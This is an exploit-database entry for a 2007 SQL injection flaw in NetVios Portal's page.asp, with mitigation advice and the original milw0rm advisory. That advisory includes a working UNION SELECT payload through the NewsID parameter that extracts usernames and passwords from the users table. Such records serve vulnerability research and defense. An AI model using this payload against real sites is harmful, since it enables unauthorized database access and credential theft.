header-logo
Suggest Exploit
vendor:
NetVios Portal
by:
parad0x
N/A
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: NetVios Portal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

NetVios Portal (page.asp) Remote SQL Injection Vulnerability

This vulnerability allows an attacker to inject SQL commands into the NewsID parameter of the page.asp file, potentially leading to unauthorized access to the database. An example of a possible exploit is provided in the text.

Mitigation:

To mitigate this vulnerability, ensure that all user input is properly validated and sanitized before being used in SQL queries. Additionally, consider using prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  NetVios Portal (page.asp) Remote SQL Injection Vulnerability
# Author  :  parad0x
# Contact :  :(
# D.Page  :  http://www.scriptaty.net/netvios-portal.html
# $$      :  Free
#S.Page : http://www.netvios.com
*******************************************************************************
http://[target]/[path]/News/page.asp?NewsID=[SQL]

Example:

//News/page.asp?NewsID=-1 union select 0,1,2,loginname,password,5,6,7 from users where userId=1

"""""""""""""""""""""
greetz : VoLqaN, x-MastER

"""""""""""""""""""""

# milw0rm.com [2007-03-19]

Navigation

Suggest Exploit

Services By CQR